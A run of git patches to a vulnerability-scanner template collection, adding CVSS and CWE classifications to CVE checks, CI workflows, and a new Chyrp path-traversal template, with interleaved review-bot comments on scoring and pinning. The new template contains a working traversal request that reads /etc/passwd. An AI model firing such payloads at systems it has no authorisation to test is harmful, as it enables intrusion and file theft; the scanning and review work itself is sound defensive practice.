tags: cve,cve2021,akkadian,mariadb,disclosure
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 4.40
+ cve-id: CVE-2021-31581
+ cwe-id: CWE-312
+ description: "The restricted shell provided by Akkadian Provisioning Manager Engine (PME) can be escaped by abusing the 'Edit MySQL Configuration' command. This command launches a standard vi editor interface which can then be escaped. This issue was resolved in Akkadian OVA appliance version 3.0 (and later), Akkadian Provisioning Manager 5.0.2 (and later), and Akkadian Appliance Manager 3.3.0.314-4a349e0 (and later)."
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-31755.yaml b/cves/2021/CVE-2021-31755.yaml
index 71be85cd28..66ef428473 100644
--- a/cves/2021/CVE-2021-31755.yaml
+++ b/cves/2021/CVE-2021-31755.yaml
@@ -9,6 +9,11 @@ info:
- https://github.com/Yu3H0/IoT_CVE/tree/main/Tenda/CVE_3
- https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai
tags: cve,cve2021,tenda,rce,oob
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2021-31755
+ cwe-id: CWE-787
requests:
- raw:
diff --git a/cves/2021/CVE-2021-31856.yaml b/cves/2021/CVE-2021-31856.yaml
index deb18ee2f2..86cd3cb7a1 100644
--- a/cves/2021/CVE-2021-31856.yaml
+++ b/cves/2021/CVE-2021-31856.yaml
@@ -9,6 +9,11 @@ info:
- https://github.com/ssst0n3/CVE-2021-31856
- https://nvd.nist.gov/vuln/detail/CVE-2021-31856
tags: sqli,cve,cve2021
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2021-31856
+ cwe-id: CWE-89
requests:
- method: GET
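Review bot: The description added to CVE-2021-31581 describes a local restricted-shell escape through the 'Edit MySQL Configuration' vi editor, and the new vector is AV:L/PR:H, yet the template under it is a `method: GET` HTTP check tagged `mariadb,disclosure` with `cwe-id: CWE-312` (cleartext storage); an HTTP probe cannot exercise a shell escape, so either the description/CVE mapping or the request is aimed at a different issue from the multi-CVE Rapid7 advisory referenced above. Please confirm against that advisory which CVE the GET check actually detects before merging this description; if both stay, add a note such as `# NOTE: the request below is a remote HTTP check; the CVSS vector above describes the local shell escape` so readers are not misled about exposure. The request body starts outside this hunk.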
diff --git a/cves/2021/CVE-2021-32030.yaml b/cves/2021/CVE-2021-32030.yaml
index 47b367c664..5918a5c871 100644
--- a/cves/2021/CVE-2021-32030.yaml
+++ b/cves/2021/CVE-2021-32030.yaml
@@ -3,10 +3,15 @@ id: CVE-2021-32030
info:
name: ASUS GT-AC2900 - Authentication Bypass
author: gy741
- severity: high
+ severity: critical
description: The administrator application on ASUS GT-AC2900 devices before 3.0.0.4.386.42643 allows authentication bypass when processing remote input from an unauthenticated user, leading to unauthorized access to the administrator interface. This relates to handle_request in router/httpd/httpd.c and auth_check in web_hook.o. An attacker-supplied value of '\0' matches the device's default value of '\0' in some situations.
reference: https://www.atredis.com/blog/2021/4/30/asus-authentication-bypass
tags: cve,cve2021,asus,auth-bypass,router
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2021-32030
+ cwe-id: CWE-287
requests:
- raw:
diff --git a/cves/2021/CVE-2021-3223.yaml b/cves/2021/CVE-2021-3223.yaml
index 801dd5b095..31a095515f 100644
--- a/cves/2021/CVE-2021-3223.yaml
+++ b/cves/2021/CVE-2021-3223.yaml
@@ -9,6 +9,11 @@ info:
- https://github.com/node-red/node-red-dashboard/issues/669
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3223
tags: cve,cve2020,node-red-dashboard,lfi
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2021-3223
+ cwe-id: CWE-22
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-32305.yaml b/cves/2021/CVE-2021-32305.yaml
index 70f2fb7787..c85b8eac3a 100644
--- a/cves/2021/CVE-2021-32305.yaml
+++ b/cves/2021/CVE-2021-32305.yaml
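Review bot: The CVE-2021-3223 hunk adds `cve-id: CVE-2021-3223` directly below the context line `tags: cve,cve2020,node-red-dashboard,lfi`, so the template now carries a 2021 CVE identifier with a `cve2020` year tag; a scan filtered with `-tags cve2021` will skip it and `-tags cve2020` will wrongly include it. Since this classification block is what makes the mismatch visible, fix the tag in the same change: `tags: cve,cve2021,node-red-dashboard,lfi`. The CVE-2021-32030 hunk on the same line is consistent and needs nothing.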
@@ -9,6 +9,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-32305 - https://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html tags: cve,cve2021,websvn,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-32305 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2021/CVE-2021-32819.yaml b/cves/2021/CVE-2021-32819.yaml index 3b08cefdd4..455e65993d 100644 --- a/cves/2021/CVE-2021-32819.yaml +++ b/cves/2021/CVE-2021-32819.yaml @@ -3,7 +3,7 @@ id: CVE-2021-32819 info: name: Nodejs squirrelly template engine RCE author: pikpikcu - severity: critical + severity: high description: | Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. There is @@ -13,6 +13,10 @@ info: - https://www.linuxlz.com/aqld/2331.html - https://blog.diefunction.io/vulnerabilities/ghsl-2021-023 tags: cve,cve2021,nodejs,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2021-32819 requests: - method: GET diff --git a/cves/2021/CVE-2021-32820.yaml b/cves/2021/CVE-2021-32820.yaml index 3c91c1e2a2..99daa3b409 100644 --- a/cves/2021/CVE-2021-32820.yaml +++ b/cves/2021/CVE-2021-32820.yaml 
@@ -3,11 +3,17 @@ id: CVE-2021-32820
info:
name: Express-handlebars Path Traversal
author: dhiyaneshDk
- severity: medium
+ severity: high
reference:
- https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/
- https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json
tags: cve,cve2021,expressjs,lfi
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+ cvss-score: 8.60
+ cve-id: CVE-2021-32820
+ cwe-id: CWE-200
+ description: "Express-handlebars is a Handlebars view engine for Express. Express-handlebars mixes pure template data with engine configuration options through the Express render API. More specifically, the layout parameter may trigger file disclosure vulnerabilities in downstream applications. This potential vulnerability is somewhat restricted in that only files with existing extentions (i.e. file.extension) can be included, files that lack an extension will have .handlebars appended to them. For complete details refer to the referenced GHSL-2021-018 report. Notes in documentation have been added to help users avoid this potential information exposure vulnerability."
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-3297.yaml b/cves/2021/CVE-2021-3297.yaml
index ae2f69e33a..801f92c40d 100644
--- a/cves/2021/CVE-2021-3297.yaml
+++ b/cves/2021/CVE-2021-3297.yaml
@@ -8,6 +8,11 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2021-3297
- https://github.com/nieldk/vulnerabilities/blob/main/zyxel%20nbg2105/Admin%20bypass
tags: cve,cve2021,zyxel,auth-bypass,router
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.80
+ cve-id: CVE-2021-3297
+ cwe-id: CWE-287
requests:
- raw:
diff --git a/cves/2021/CVE-2021-33221.yaml b/cves/2021/CVE-2021-33221.yaml
index b64016ff6a..9b713950a9 100644
--- a/cves/2021/CVE-2021-33221.yaml
+++ b/cves/2021/CVE-2021-33221.yaml
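Review bot: The classification copied into CVE-2021-3297 is AV:L/AC:L/PR:L (7.80), i.e. local access with existing privileges, but the template is tagged `auth-bypass,router` and sends `raw:` HTTP requests, so a reader comparing the vector with the check will not know which to trust when judging remote exposure. If the vector is NVD's verbatim rating, keep it but add a description sentence stating that the check itself is performed unauthenticated over the network (no description field is visible in this hunk; add one if the file has none). The CVE-2021-32820 hunk above it is consistent, apart from the inherited "extentions" typo in the copied description. The request body of CVE-2021-3297 starts outside this hunk.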
@@ -5,8 +5,13 @@ info:
author: geeknik
description: A 'service details' API endpoint discloses system and configuration information to an attacker without requiring authentication. This information includes DNS and NTP servers that the devices use for time and host resolution. It also includes the internal hostname and IoT Controller version. A fully configured device in production may leak other, more sensitive information (API keys and tokens).
reference: https://www.commscope.com/globalassets/digizuite/917216-faq-security-advisory-id-20210525-v1-0.pdf
- severity: medium
+ severity: critical
tags: cve,cve2021,commscope,ruckus,debug
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2021-33221
+ cwe-id: CWE-306
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-33564.yaml b/cves/2021/CVE-2021-33564.yaml
index a2bbd5d431..b6b1e0781e 100644
--- a/cves/2021/CVE-2021-33564.yaml
+++ b/cves/2021/CVE-2021-33564.yaml
@@ -6,6 +6,12 @@ info:
severity: critical
reference: https://zxsecurity.co.nz/research/argunment-injection-ruby-dragonfly/
tags: cve,cve2021,rce,ruby
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2021-33564
+ cwe-id: CWE-88
+ description: "An argument injection vulnerability in the Dragonfly gem before 1.4.0 for Ruby allows remote attackers to read and write to arbitrary files via a crafted URL when the verify_url option is disabled. This may lead to code execution. The problem occurs because the generate and process features mishandle use of the ImageMagick convert utility."
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-3374.yaml b/cves/2021/CVE-2021-3374.yaml
index a337b419ae..8446f3f830 100644
--- a/cves/2021/CVE-2021-3374.yaml
+++ b/cves/2021/CVE-2021-3374.yaml
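Review bot: CVE-2021-33221 jumps from medium to critical on a C:H/I:H/A:H vector, but the template's own description, kept as context in the same hunk, calls it an unauthenticated endpoint that "discloses system and configuration information"; High integrity and availability impact is hard to reconcile with a read-only leak, and the tag list still says `debug` rather than `exposure` or `disclosure` like the other disclosure templates in this patch. If the vector is a verbatim NVD copy it is worth keeping, but then the description should say that the score is driven by missing authentication (the `cwe-id: CWE-306` just added) rather than by the leaked data, e.g. append `Rated critical by NVD for missing authentication (CWE-306); what this check observes is an information disclosure.` The CVE-2021-33564 hunk below it is consistent and needs nothing.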
@@ -7,6 +7,11 @@ info: reference: https://github.com/colemanjp/rstudio-shiny-server-directory-traversal-source-code-leak severity: medium tags: cve,cve2021,rstudio,traversal + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2021-3374 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2021/CVE-2021-3377.yaml b/cves/2021/CVE-2021-3377.yaml index 1b44686e3e..58c38c5802 100644 --- a/cves/2021/CVE-2021-3377.yaml +++ b/cves/2021/CVE-2021-3377.yaml @@ -9,6 +9,11 @@ info: author: geeknik severity: medium tags: cve,cve2021,xss,npm + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-3377 + cwe-id: CWE-79 requests: - raw: diff --git a/cves/2021/CVE-2021-3378.yaml b/cves/2021/CVE-2021-3378.yaml index f39c826555..80215a832b 100644 --- a/cves/2021/CVE-2021-3378.yaml +++ b/cves/2021/CVE-2021-3378.yaml @@ -10,6 +10,11 @@ info: via insecure POST request. It has been tested on version 4.4.2.2 in Windows 10 Enterprise. tags: cve,cve2021,fortilogger,fortigate,fortinet + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-3378 + cwe-id: CWE-434 requests: - raw: diff --git a/cves/2021/CVE-2021-33807.yaml b/cves/2021/CVE-2021-33807.yaml index 7ffb782090..4cee9b0a73 100644 --- a/cves/2021/CVE-2021-33807.yaml +++ b/cves/2021/CVE-2021-33807.yaml @@ -9,6 +9,11 @@ info: - https://www.on-x.com/sites/default/files/on-x_-_security_advisory_-_gespage_-_cve-2021-33807.pdf - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33807 tags: cve,cve2021,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-33807 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2021/CVE-2021-33904.yaml b/cves/2021/CVE-2021-33904.yaml index cdb7130cd7..1e62c84265 100644 --- a/cves/2021/CVE-2021-33904.yaml +++ b/cves/2021/CVE-2021-33904.yaml 
@@ -7,6 +7,11 @@ info: reference: https://www.exploit-db.com/exploits/49980 severity: medium tags: cve,cve2021,accela,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-33904 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-34370.yaml b/cves/2021/CVE-2021-34370.yaml index a920b1c540..0e34c5c406 100644 --- a/cves/2021/CVE-2021-34370.yaml +++ b/cves/2021/CVE-2021-34370.yaml @@ -10,6 +10,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-34370 - https://www.accela.com/civic-platform/ tags: xss,redirect,cve,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-34370 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-34429.yaml b/cves/2021/CVE-2021-34429.yaml index 726f1cffae..fa1c651a3a 100644 --- a/cves/2021/CVE-2021-34429.yaml +++ b/cves/2021/CVE-2021-34429.yaml @@ -9,6 +9,11 @@ info: reference: - https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm tags: cve,cve2021,jetty + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2021-34429 + cwe-id: CWE-200 requests: - raw: diff --git a/cves/2021/CVE-2021-34473.yaml b/cves/2021/CVE-2021-34473.yaml index 5a10ae6168..68a4fd2b38 100644 --- a/cves/2021/CVE-2021-34473.yaml +++ b/cves/2021/CVE-2021-34473.yaml @@ -11,6 +11,10 @@ info: - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1 tags: cve,cve2021,ssrf,rce,exchange + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-34473 requests: - method: GET diff --git a/cves/2021/CVE-2021-34621.yaml b/cves/2021/CVE-2021-34621.yaml index 9a97a4f4e5..4362823530 100644 --- a/cves/2021/CVE-2021-34621.yaml 
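Review bot: The new `classification` block for CVE-2021-34473 is the only one in this series without a `cwe-id`, which every other annotated template in these hunks carries. If the source the block was generated from lists a weakness, add it as `cwe-id: <CWE id>` so the block matches its siblings; if none is published, a short `# no CWE published for this CVE` comment keeps the omission from reading as an oversight.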
+++ b/cves/2021/CVE-2021-34621.yaml @@ -6,6 +6,12 @@ info: severity: critical reference: https://www.wordfence.com/blog/2021/06/easily-exploitable-critical-vulnerabilities-patched-in-profilepress-plugin tags: cve,cve2021,wordpress,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-34621 + cwe-id: CWE-269 + description: "A vulnerability in the user registration component found in the ~/src/Classes/RegistrationAuth.php file of the ProfilePress WordPress plugin made it possible for users to register on sites as an administrator. This issue affects versions 3.0.0 - 3.1.3. ." requests: - raw: diff --git a/cves/2021/CVE-2021-35464.yaml b/cves/2021/CVE-2021-35464.yaml index f3e3f41ee9..a7800fd3ac 100644 --- a/cves/2021/CVE-2021-35464.yaml +++ b/cves/2021/CVE-2021-35464.yaml @@ -12,6 +12,11 @@ info: tags: cve,cve2021,openam,rce,java reference: - https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-35464 + cwe-id: CWE-502 requests: - method: GET diff --git a/cves/2021/CVE-2021-36380.yaml b/cves/2021/CVE-2021-36380.yaml index 7030f465af..afdeff9e10 100644 --- a/cves/2021/CVE-2021-36380.yaml +++ b/cves/2021/CVE-2021-36380.yaml @@ -8,6 +8,11 @@ info: reference: - https://research.nccgroup.com/2021/07/26/technical-advisory-sunhillo-sureline-unauthenticated-os-command-injection-cve-2021-36380/ tags: cve,cve2021,sureline,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-36380 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2021/CVE-2021-37216.yaml b/cves/2021/CVE-2021-37216.yaml index 33de2b4095..de96cad6d0 100644 --- a/cves/2021/CVE-2021-37216.yaml +++ b/cves/2021/CVE-2021-37216.yaml 
@@ -10,6 +10,11 @@ info: reference: https://www.twcert.org.tw/tw/cp-132-4962-44cd2-1.html severity: medium tags: cve,cve2021,xss,qsan + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-37216 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-37538.yaml b/cves/2021/CVE-2021-37538.yaml index 758e66491c..c7327b670e 100644 --- a/cves/2021/CVE-2021-37538.yaml +++ b/cves/2021/CVE-2021-37538.yaml @@ -3,12 +3,17 @@ id: CVE-2021-37538 info: name: PrestaShop SmartBlog SQL Injection author: whoever - severity: high + severity: critical description: PrestaShop SmartBlog by SmartDataSoft < 4.0.6 is vulnerable to a SQL injection in the blog archive functionality. tags: cve,cve2021,prestashop,smartblog,sqli reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37538 - https://blog.sorcery.ie/posts/smartblog_sqli/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-37538 + cwe-id: CWE-89 requests: - method: GET diff --git a/cves/2021/CVE-2021-37573.yaml b/cves/2021/CVE-2021-37573.yaml index 6c9c42fe15..aa50dba941 100644 --- a/cves/2021/CVE-2021-37573.yaml +++ b/cves/2021/CVE-2021-37573.yaml @@ -7,6 +7,12 @@ info: reference: - https://seclists.org/fulldisclosure/2021/Aug/13 tags: cve,cve2021,xss,tjws + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-37573 + cwe-id: CWE-79 + description: "A reflected cross-site scripting (XSS) vulnerability in the web server TTiny Java Web Server and Servlet Container (TJWS) <=1.115 allows an adversary to inject malicious code on the server's \"404 Page not Found\" error page" requests: - method: GET diff --git a/cves/2021/CVE-2021-37704.yaml b/cves/2021/CVE-2021-37704.yaml index f9424b16b2..cefb540971 100644 --- a/cves/2021/CVE-2021-37704.yaml +++ b/cves/2021/CVE-2021-37704.yaml 
@@ -3,12 +3,17 @@ id: CVE-2021-37704 info: name: phpfastcache phpinfo exposure author: whoever - severity: low + severity: medium description: phpinfo() exposure in unprotected composer vendor folder via phpfastcache/phpfastcache. tags: cve,cve2021,exposure,phpfastcache reference: https://github.com/PHPSocialNetwork/phpfastcache/pull/813 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37704 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.30 + cve-id: CVE-2021-37704 + cwe-id: CWE-668 requests: - method: GET diff --git a/cves/2021/CVE-2021-38702.yaml b/cves/2021/CVE-2021-38702.yaml index c17a52845f..cf51a9d3b3 100644 --- a/cves/2021/CVE-2021-38702.yaml +++ b/cves/2021/CVE-2021-38702.yaml @@ -7,6 +7,11 @@ info: description: Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 allow for reflected Cross Site Scripting via the 'u' parameter of ft.php. reference: https://seclists.org/fulldisclosure/2021/Aug/20 tags: cve,cve2021,cyberoam,netgenie,xss,router + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-38702 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-38751.yaml b/cves/2021/CVE-2021-38751.yaml index 209200dcb3..f65c7095ad 100644 --- a/cves/2021/CVE-2021-38751.yaml +++ b/cves/2021/CVE-2021-38751.yaml @@ -13,6 +13,11 @@ info: - https://github.com/exponentcms/exponent-cms/issues/1544 - https://github.com/exponentcms/exponent-cms/blob/a9fa9358c5e8dc2ce7ad61d7d5bea38505b8515c/exponent_constants.php#L56-L64 tags: cve,cve2021,exponentcms + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.30 + cve-id: CVE-2021-38751 + cwe-id: CWE-116 requests: - method: GET From 8b31e0d006d16296c987f5aa05632bcc2c9dd56c Mon Sep 17 00:00:00 2001 
From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 10 Sep 2021 17:41:35 +0530 Subject: [PATCH 136/339] Added CVE Annotation workflow --- .github/workflows/cve-annotate.yaml | 45 +++++++++++++++++++++++++++++ 1 file changed, 45 insertions(+) create mode 100644 .github/workflows/cve-annotate.yaml diff --git a/.github/workflows/cve-annotate.yaml b/.github/workflows/cve-annotate.yaml new file mode 100644 index 0000000000..d29ea24563 --- /dev/null +++ b/.github/workflows/cve-annotate.yaml @@ -0,0 +1,45 @@ +name: ✍🏻 CVE Annotate + +on: + pull_request: + branches: + - master + workflow_dispatch: + +jobs: + docs: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@master + with: + persist-credentials: false + fetch-depth: 0 + token: ${{ secrets.GITHUB_TOKEN }} + + - uses: actions/setup-go@v2 + with: + go-version: 1.17 + + - name: Generate CVE Annotations + id: cve-annotate + run: | + if ! which cve-annotate > /dev/null; then + echo -e "Command cve-annotate not found! Installing\c" + go install github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@dev + fi + cve-annotate -i ./cves/ -d . + echo "::set-output name=changes::$(git status -s | wc -l)" + + - name: Commit files + if: steps.cve-annotate.outputs.changes > 0 + run: | + git config --local user.email "action@github.com" + git config --local user.name "GitHub Action" + git add cves + git commit -m "Auto Generated CVE annotations [$(date)] :robot:" -a + + - name: Push changes + if: steps.cve-annotate.outputs.changes > 0 + uses: ad-m/github-push-action@master + with: + github_token: ${{ secrets.GITHUB_TOKEN }} From 68abf454eb163a21324cf0e914fb011e323fd226 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 10 Sep 2021 17:47:08 +0530 Subject: [PATCH 137/339] misc update --- .github/workflows/template-validate.yml | 13 +++++-------- .github/workflows/templates-stats.yml | 17 +++++------------ 2 files changed, 10 insertions(+), 20 deletions(-) 
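Review bot: The new cve-annotate workflow resolves three mutable references at run time — `actions/checkout@master`, `ad-m/github-push-action@master` and `go install github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@dev` — and the third-party push action is handed `secrets.GITHUB_TOKEN`, so whoever controls those branches controls what gets committed to this repository. Pin the actions to a full commit SHA (`uses: ad-m/github-push-action@<commit-sha>`) and the Go tool to a tagged version rather than a branch. The same floating refs appear in the template-validate.yml and templates-stats.yml hunks of the next commit and in the later `@dev`/`@master` flips of this file. Minor: `git commit ... -a` after `git add cves` presumably also stages any tracked file the tool touched outside `cves`; dropping `-a` keeps the auto-commit limited to the directory that was added.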
diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index d0d3ede28e..95e3f9a597 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -6,13 +6,10 @@ jobs: build: runs-on: ubuntu-latest steps: - - name: Checkout Repo - uses: actions/checkout@master - - - name: Setup golang - uses: actions/setup-go@v2 - with: - go-version: 1.14 + - uses: actions/checkout@master + - uses: actions/setup-go@v2 + with: + go-version: 1.17 #- name: Cache Go # id: cache-go @@ -26,7 +23,7 @@ jobs: env: GO111MODULE: on run: | - go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei + go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@dev shell: bash - name: Template Validation diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index 3fbb305a96..db02a5df05 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -11,21 +11,14 @@ jobs: runs-on: ubuntu-latest if: github.repository == 'projectdiscovery/nuclei-templates' && github.ref == 'refs/heads/master' steps: - - name: Checkout Repo - uses: actions/checkout@master - with: - fetch-depth: 0 - - - name: Setup golang - uses: actions/setup-go@v2 - with: - go-version: 1.14 + - uses: actions/checkout@master + - uses: actions/setup-go@v2 + with: + go-version: 1.17 - name: Installing Template Stats - env: - GO111MODULE: on run: | - go get -v github.com/projectdiscovery/templates-stats@main + go install github.com/projectdiscovery/templates-stats@main shell: bash - name: Markdown Stats From a9d3acdd3d70efdf02f60e9f30e7482e87e0ac36 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 10 Sep 2021 17:48:49 +0530 Subject: [PATCH 138/339] Update cve-annotate.yaml --- .github/workflows/cve-annotate.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) 
diff --git a/.github/workflows/cve-annotate.yaml b/.github/workflows/cve-annotate.yaml index d29ea24563..bb66805d9f 100644 --- a/.github/workflows/cve-annotate.yaml +++ b/.github/workflows/cve-annotate.yaml @@ -15,9 +15,9 @@ jobs: persist-credentials: false fetch-depth: 0 token: ${{ secrets.GITHUB_TOKEN }} - + - uses: actions/setup-go@v2 - with: + with: go-version: 1.17 - name: Generate CVE Annotations From cde816535ae6d9b4acab9470008663762ae9912c Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 10 Sep 2021 17:50:25 +0530 Subject: [PATCH 139/339] misc update --- .github/workflows/{cve-annotate.yaml => cve-annotate.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename .github/workflows/{cve-annotate.yaml => cve-annotate.yml} (100%) diff --git a/.github/workflows/cve-annotate.yaml b/.github/workflows/cve-annotate.yml similarity index 100% rename from .github/workflows/cve-annotate.yaml rename to .github/workflows/cve-annotate.yml From 38c66ed681285b478d81fb6dc29f0337b90e9a37 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 10 Sep 2021 20:27:44 +0700 Subject: [PATCH 140/339] Create CVE-2011-2780.yaml --- cves/2011/CVE-2011-2780.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2011/CVE-2011-2780.yaml diff --git a/cves/2011/CVE-2011-2780.yaml b/cves/2011/CVE-2011-2780.yaml new file mode 100644 index 0000000000..db72d7955c --- /dev/null +++ b/cves/2011/CVE-2011-2780.yaml 
@@ -0,0 +1,31 @@ +id: CVE-2011-2780 + +info: + name: Chyrp 2.x - Local File Inclusion (LFI) + author: daffainfo + severity: high + description: Directory traversal vulnerability in includes/lib/gz.php in Chyrp 2.0 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. + reference: + - https://www.exploit-db.com/exploits/35946 + - https://www.cvedetails.com/cve/CVE-2011-2780 + tags: cve,cve2011,lfi + classification: + cvss-score: 5.0 + cve-id: CVE-2011-2780 + cwe-id: CWE-22 + +requests: + - method: GET + path: + - "{{BaseURL}}/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 63eabba7583529c769af4a711c4350c1d6aac832 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 10 Sep 2021 22:51:07 +0530 Subject: [PATCH 141/339] Update cve-annotate.yml --- .github/workflows/cve-annotate.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/cve-annotate.yml b/.github/workflows/cve-annotate.yml index bb66805d9f..754b772885 100644 --- a/.github/workflows/cve-annotate.yml +++ b/.github/workflows/cve-annotate.yml @@ -25,7 +25,7 